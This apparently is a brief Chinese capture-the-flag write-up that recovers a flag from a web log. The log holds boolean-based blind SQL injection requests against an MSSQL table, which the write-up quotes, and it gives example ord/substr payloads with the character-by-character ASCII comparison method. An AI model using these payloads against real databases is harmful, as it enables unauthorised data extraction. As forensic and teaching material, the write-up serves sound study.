下下来一个日志,先解码
搜索flag,在尾部发现布尔型盲注的日志:
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32 80 - 192.168.1.101 200 0 0 id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56 80 - 192.168.1.101 500 0 0
?id =1 and (select ord(substr(flag,1,1)) from flag)>96
?id =1 and (select ord(substr(flag,1,1)) from flag)>97
学sql注入的时候猜字段,比如说>96的 时候是true 而>97是false,那么说明这个字符的ASCII值就是97
在日志里提取出flag,然后依次分析。